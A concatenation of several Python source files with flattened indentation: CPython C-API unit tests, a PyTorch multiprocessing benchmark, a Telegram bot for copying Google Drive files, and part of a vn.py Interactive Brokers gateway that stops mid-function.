self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, "")
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature (boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "(sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"This docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"(parameter)")
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l has grown to n entries
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Modules")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out.decode("latin1"), err.decode("latin1")
def test_subinterps(self):
# This is just a "don't crash" test
out, err = self.run_embedded_interpreter()
if support.verbose:
print()
print(out)
print(err)
@staticmethod
def _get_default_pipe_encoding():
rp, wp = os.pipe()
try:
with os.fdopen(wp, 'w') as w:
default_pipe_encoding = w.encoding
finally:
os.close(rp)
return default_pipe_encoding
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
out, err = self.run_embedded_interpreter("forced_io_encoding")
if support.verbose:
print()
print(out)
print(err)
expected_stdin_encoding = sys.__stdin__.encoding
expected_pipe_encoding = self._get_default_pipe_encoding()
expected_output = os.linesep.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {0}:strict",
"stdout: {1}:strict",
"stderr: {1}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: surrogateescape",
"stdin: {0}:surrogateescape",
"stdout: {1}:surrogateescape",
"stderr: {1}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:strict",
"stdout: latin-1:strict",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: surrogateescape",
"stdin: latin-1:surrogateescape",
"stdout: latin-1:surrogateescape",
"stderr: latin-1:backslashreplace"]).format(expected_stdin_encoding,
expected_pipe_encoding)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() returns consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except TypeError as e:
s = "argument 1 must be impossible<bad format char>, not int"
when_not_skipped = (str(e) == s)
except RuntimeError as e:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except RuntimeError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
if __name__ == "__main__":
unittest.main()
|
802_pytorch_nnBenchmark_threadNumAndMultiProcess.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 5 20:01:56 2019
@author: yangyutu123
"""
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.multiprocessing import Process
from termcolor import colored as clr
class TestNet(nn.Module):
""" Net for low-dimensional games.
"""
def __init__(self, input_channels, hist_len, action_no):
self.in_channels = hist_len * input_channels
super(TestNet, self).__init__()
self.conv1 = nn.Conv2d(self.in_channels, 32, kernel_size=5,
stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.lin1 = nn.Linear(512, 32)
self.head = nn.Linear(32, action_no)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.lin1(x.view(x.size(0), -1)))
return self.head(x.view(x.size(0), -1))
def play(steps, model, allocate_on_cpu=False):
state = torch.rand(1, 1, 24, 24)
batch = torch.rand(5, 1, 24, 24)
model(state).data.max(1)[1]
model.zero_grad()
y = model(batch).max(1)[0]
t = torch.randn(y.size())
loss = F.smooth_l1_loss(y, t)
loss.backward()
def work_unit(pidx, steps, model):
# this line is critical: if it is not set, each individual process spawns multiple threads, which greatly reduces speed.
torch.set_num_threads(1)
print("[worker #%d] started." % pidx)
print("[worker #%d] has %d threads." % (pidx, torch.get_num_threads()))
for i in range(steps):
play(steps, model)
print("[worker #%d] finished." % pidx)
if __name__ == "__main__":
torch.manual_seed(42)
torch.set_num_threads(1)
torch.set_default_tensor_type("torch.FloatTensor")
steps = 30000
j = 8
print(clr("Benchmark settings:", 'green'))
print("No of threads available: %d" % torch.get_num_threads())
print(clr("No of 'game steps': %d" % steps))
print(clr("No of agents (processes): %d" % j))
model = TestNet(1, 1, 3).share_memory()
p_steps = int(steps / j)
processes = [Process(target=work_unit, args=(p, p_steps, model))
for p in range(j)]
start = time.time()
for p in processes:
p.start()
for p in processes:
p.join()
print(clr("Time: %.3f seconds." % (time.time() - start), 'green'))
|
iCopy.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os, sys, logging
from telegram import Bot
from telegram.utils.request import Request as TGRequest
from utils import load
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from utils import (
get_set as _set,
get_functions as _func,
task_box as _box,
task_payload as _payload,
callback_stage as _stage,
__version__,
)
from workflow import (
start_workflow as _start,
quick_workflow as _quick,
copy_workflow as _copy,
size_workflow as _size,
regex_workflow as _regex,
purge_workflow as _purge,
dedupe_workflow as _dedupe,
)
from multiprocessing import Process as _mp, Manager
from threading import Thread
from utils.load import ns
from web import dash
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
# ############################### Main ####################################
def main():
### define the bot
request = TGRequest(con_pool_size=8)
bot = Bot(token=f"{load.cfg['tg']['token']}", request=request)
updater = Updater(bot=bot, use_context=True)
### check whether the bot is coming back from a restart
is_restart = load.db_counters.find_one({"_id": "is_restart"})
if is_restart is not None:
if is_restart["status"] == 0:
pass
else:
_func.check_restart(bot)
else:
load.db_counters.update(
{"_id": "is_restart"}, {"status": 0}, upsert=True,
)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("set", _set._setting),
CommandHandler("menu", _start.menu),
CommandHandler("quick", _quick.quick),
CommandHandler("copy", _copy.copy),
CommandHandler("task", _box.taskinfo),
CommandHandler("size", _size.size),
CommandHandler("purge", _purge.purge),
CommandHandler("dedupe", _dedupe.dedupe),
MessageHandler(
Filters.regex(pattern=load.regex_entry_pattern), _regex.regex_entry
),
],
states={
_stage.SET_FAV_MULTI: [
# fav settings function
MessageHandler(Filters.text, _set._multi_settings_recieved),
],
_stage.CHOOSE_MODE: [
# call the handler selected via the callback pattern
CallbackQueryHandler(_quick.quick, pattern="quick"),
CallbackQueryHandler(_copy.copy, pattern="copy"),
],
_stage.GET_LINK: [
# get Shared_Link states
MessageHandler(Filters.text, _func.get_share_link),
],
_stage.IS_COVER_QUICK: [
# cover quick setting
CallbackQueryHandler(_func.modify_quick_in_db, pattern="cover_quick"),
CallbackQueryHandler(_func.cancel, pattern="not_cover_quick"),
MessageHandler(Filters.text, _func.cancel),
],
_stage.GET_DST: [
# request DST
CallbackQueryHandler(_copy.request_srcinfo),
],
_stage.COOK_ID: [
# request to COOK ID
MessageHandler(Filters.text, _size.size_handle),
],
_stage.REGEX_IN: [
# regex in choose mode
CallbackQueryHandler(_regex.regex_callback, pattern=r"quick|copy|size"),
],
_stage.REGEX_GET_DST: [
# regex copy end
CallbackQueryHandler(_regex.regex_copy_end),
],
_stage.COOK_FAV_TO_SIZE: [CallbackQueryHandler(_size.pre_cook_fav_to_size),],
_stage.COOK_FAV_PURGE: [CallbackQueryHandler(_purge.pre_to_purge),],
_stage.COOK_ID_DEDU: [CallbackQueryHandler(_dedupe.dedupe_mode),],
_stage.COOK_FAV_DEDU: [CallbackQueryHandler(_dedupe.dedupe_fav_mode),],
_stage.FAV_PRE_DEDU_INFO: [CallbackQueryHandler(_dedupe.pre_favdedu_info)],
_stage.SET_WEB: [MessageHandler(Filters.text, _set.setWeb),],
},
fallbacks=[CommandHandler("cancel", _func.cancel)],
)
def stop_and_restart():
progress.terminate()
load.myclient.close()
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
restart_msg = update.message.reply_text(load._text[load._lang]["is_restarting"])
restart_chat_id = restart_msg.chat_id
restart_msg_id = restart_msg.message_id
load.db_counters.update_one(
{"_id": "is_restart"},
{
"$set": {
"status": 1,
"chat_id": restart_chat_id,
"message_id": restart_msg_id,
}
},
True,
)
Thread(target=stop_and_restart).start()
dp.add_handler(conv_handler)
dp.add_handler(CommandHandler("start", _start.start))
dp.add_handler(CommandHandler("reset", _box.task_reset))
dp.add_handler(CommandHandler("kill", _func.taskill))
dp.add_handler(CommandHandler("ver", _func._version))
dp.add_handler(
CommandHandler(
"restart",
restart,
filters=Filters.user(user_id=int(load.cfg["tg"]["usr_id"])),
)
)
dp.add_error_handler(_func.error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy " + __version__.__version__ + " Start")
updater.idle()
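# --- hedged sketch (not part of the original bot) ---
# The /restart handler defined above relies on a small pattern: do the actual
# shutdown-and-exec work in a helper thread, so the Telegram handler can return
# (and the "is restarting" message can be delivered) before the process image
# is replaced. Distilled to its core, with illustrative names:
def _exec_self_restart():
    os.execl(sys.executable, sys.executable, *sys.argv)
def _schedule_restart():
    Thread(target=_exec_self_restart).start()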
if __name__ == "__main__":
ns.x = 0
progress = _mp(target=_payload.task_buffer, args=(ns,))
progress.start()
if load.cfg['web']['dashboard']:
web = _mp(target=dash.dashboard)
web.start()
main()
|
ib_gateway.py
|
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
SI-202006-1000-USD-FUT NYMEX
ES-2020006-C-2430-50-USD-FOP GLOBEX
"""
from copy import copy
from datetime import datetime, timedelta
from threading import Thread, Condition
from typing import Optional, Dict, Any, List
import shelve
from pytz import BaseTzInfo
from tzlocal import get_localzone
from vnpy.event import EventEngine
from ibapi.client import EClient
from ibapi.common import OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
from vnpy.trader.event import EVENT_TIMER
from vnpy.event import Event
# Order status mapping
STATUS_IB2VT: Dict[str, Status] = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
# Direction (long/short) mapping
DIRECTION_VT2IB: Dict[Direction, str] = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT: Dict[str, Direction] = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
# Order type mapping
ORDERTYPE_VT2IB: Dict[OrderType, str] = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT: Dict[str, OrderType] = {v: k for k, v in ORDERTYPE_VT2IB.items()}
# Exchange mapping
EXCHANGE_VT2IB: Dict[Exchange, str] = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA",
Exchange.EDGEA: "EDGEA",
Exchange.ISLAND: "ISLAND",
Exchange.BATS: "BATS",
Exchange.IEX: "IEX",
Exchange.IBKRATS: "IBKRATS",
Exchange.OTC: "PINK",
Exchange.SGX: "SGX"
}
EXCHANGE_IB2VT: Dict[str, Exchange] = {v: k for k, v in EXCHANGE_VT2IB.items()}
# Product type mapping
PRODUCT_IB2VT: Dict[str, Product] = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOP": Product.OPTION,
"CONTFUT": Product.FUTURES
}
# Option type mapping
OPTION_VT2IB: Dict[OptionType, str] = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
# Currency type mapping
CURRENCY_VT2IB: Dict[Currency, str] = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
# Tick data field mapping
TICKFIELD_IB2VT: Dict[int, str] = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
# Account field mapping
ACCOUNTFIELD_IB2VT: Dict[str, str] = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
# Bar interval mapping
INTERVAL_VT2IB: Dict[Interval, str] = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
# Other constants
JOIN_SYMBOL: str = "-"
class IbGateway(BaseGateway):
"""
vn.py gateway for connecting to Interactive Brokers.
"""
default_setting: Dict[str, Any] = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1,
"交易账户": ""
}
exchanges: List[str] = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine: EventEngine, gateway_name: str = "IB") -> None:
"""构造函数"""
super().__init__(event_engine, gateway_name)
self.api: "IbApi" = IbApi(self)
self.count: int = 0
def connect(self, setting: dict) -> None:
"""连接交易接口"""
host: str = setting["TWS地址"]
port: int = setting["TWS端口"]
clientid: int = setting["客户号"]
account: str = setting["交易账户"]
self.api.connect(host, port, clientid, account)
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def close(self) -> None:
"""关闭接口"""
self.api.close()
def subscribe(self, req: SubscribeRequest) -> None:
"""订阅行情"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
self.api.cancel_order(req)
def query_account(self) -> None:
"""查询资金"""
pass
def query_position(self) -> None:
"""查询持仓"""
pass
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询历史数据"""
return self.api.query_history(req)
def process_timer_event(self, event: Event) -> None:
"""定时事件处理"""
self.count += 1
if self.count < 10:
return
self.count = 0
self.api.check_connection()
class IbApi(EWrapper):
"""IB的API接口"""
data_filename: str = "ib_contract_data.db"
data_filepath: str = str(get_file_path(data_filename))
local_tz: BaseTzInfo = get_localzone()
def __init__(self, gateway: IbGateway) -> None:
"""构造函数"""
super().__init__()
self.gateway: IbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.status: bool = False
self.reqid: int = 0
self.orderid: int = 0
self.clientid: int = 0
self.history_reqid: int = 0
self.account: str = ""
self.ticks: Dict[int, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.tick_exchange: Dict[int, Exchange] = {}
self.subscribed: Dict[str, SubscribeRequest] = {}
self.data_ready: bool = False
self.history_req: HistoryRequest = None
self.history_condition: Condition = Condition()
self.history_buf: List[BarData] = []
self.client: EClient = EClient(self)
def connectAck(self) -> None:
"""连接成功回报"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
self.load_contract_data()
self.data_ready = False
def connectionClosed(self) -> None:
"""连接断开回报"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int) -> None:
"""下一个有效订单号回报"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
def currentTime(self, time: int) -> None:
"""IB当前服务器时间回报"""
super().currentTime(time)
dt: datetime = datetime.fromtimestamp(time)
time_string: str = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg: str = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(self, reqId: TickerId, errorCode: int, errorString: str) -> None:
"""具体错误请求回报"""
super().error(reqId, errorCode, errorString)
if reqId == self.history_reqid:
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
msg: str = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
# Market data server is connected
if errorCode == 2104 and not self.data_ready:
self.data_ready = True
self.client.reqCurrentTime()
reqs: list = list(self.subscribed.values())
self.subscribed.clear()
for req in reqs:
self.subscribe(req)
def tickPrice(
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
) -> None:
"""tick价格更新回报"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick: TickData = self.ticks[reqId]
name: str = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update the name field of the tick
contract: ContractData = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Locally compute tick time and last price for IDEALPRO forex and spot commodities
exchange: Exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO or "CMDTY" in tick.symbol:
if not tick.bid_price_1 or not tick.ask_price_1:
return
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
) -> None:
"""tick数量更新回报"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick: TickData = self.ticks[reqId]
name: str = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
) -> None:
"""tick字符串更新回报"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick: TickData = self.ticks[reqId]
dt: datetime = datetime.fromtimestamp(int(value))
tick.datetime = self.local_tz.localize(dt)
self.gateway.on_tick(copy(tick))
def orderStatus(
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
) -> None:
"""订单状态更新回报"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid: str = str(orderId)
order: OrderData = self.orders.get(orderid, None)
if not order:
return
order.traded = filled
# Ignore statuses without a mapping (e.g. pending cancel)
order_status: Status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder(
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
) -> None:
"""新订单回报"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid: str = str(orderId)
order: OrderData = OrderData(
symbol=generate_symbol(ib_contract),
exchange=EXCHANGE_IB2VT.get(ib_contract.exchange, Exchange.SMART),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue(
self, key: str, val: str, currency: str, accountName: str
) -> None:
"""账号更新回报"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid: str = f"{accountName}.{currency}"
account: AccountData = self.accounts.get(accountid, None)
if not account:
account: AccountData = AccountData(
accountid=accountid,
gateway_name=self.gateway_name
)
self.accounts[accountid] = account
name: str = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio(
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
) -> None:
"""持仓更新回报"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange: Exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange: Exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange: Exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg: str = f"存在不支持的交易所持仓{generate_symbol(contract)} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
try:
ib_size: int = int(contract.multiplier)
except ValueError:
ib_size = 1
price = averageCost / ib_size
pos: PositionData = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str) -> None:
"""账号更新时间回报"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails) -> None:
"""合约数据更新回报"""
super().contractDetails(reqId, contractDetails)
# Generate the vn.py symbol from the IB contract
ib_contract: Contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol: str = generate_symbol(ib_contract)
# Build the contract object
contract: ContractData = ContractData(
symbol=symbol,
